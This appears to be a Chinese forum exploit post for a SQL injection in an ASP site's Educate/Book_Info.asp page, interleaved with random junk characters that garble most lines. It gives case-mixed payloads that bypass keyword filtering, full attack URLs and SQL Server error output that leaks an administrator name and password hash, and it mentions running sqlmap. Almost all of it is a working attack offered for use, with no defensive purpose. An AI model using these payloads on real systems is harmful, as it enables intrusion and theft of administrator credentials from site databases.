漏洞出现在Educate/Book_Info.asp
, b* A( H+ u. X+ S' n + C# ~$ |+ ^6 ^# N/ u
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出5 z* h- c$ [ Y! G/ `' Y
. B( ^7 U2 D5 f
exp:如下
; ]5 `7 R1 H m0 f: ^3 h/ y+ A1 p查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
( E9 j. X6 q [& |* E% }* j查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
8 c# m9 v) ]3 H0 b; _# c, p
( B% ^: |* e; c: v* f, shttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
/ l- i2 R- h# H* f- ^$ h7 [ 6 I1 ?- |! d, y, k
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
8 I, O4 _$ K3 U1 B- T% X; `
1 O1 v: t% }' |; a2 e$ C将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。. W; ?- w) p j6 d g6 h9 C
) _+ z) k8 _: T" a4 A
/Educate/Book_Info.asp,行 8% [. A: j/ Y( ?) |4 h8 X
6 C9 b V4 M3 S6 Z
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
6 z* K; Z; F3 s0 N8 q; _5 v
3 o; v" f1 M9 I' h+ TMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'$ W6 z1 C; D" `, G
; d4 O. L# k/ l将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。* [- P1 ^) U& K* A5 n. }3 o
6 G" L; I6 t6 r* @. I8 g6 ?3 Z/Educate/Book_Info.asp,行 8
0 n8 N2 K! J, ]1 t2 v& P8 @7 o8 G |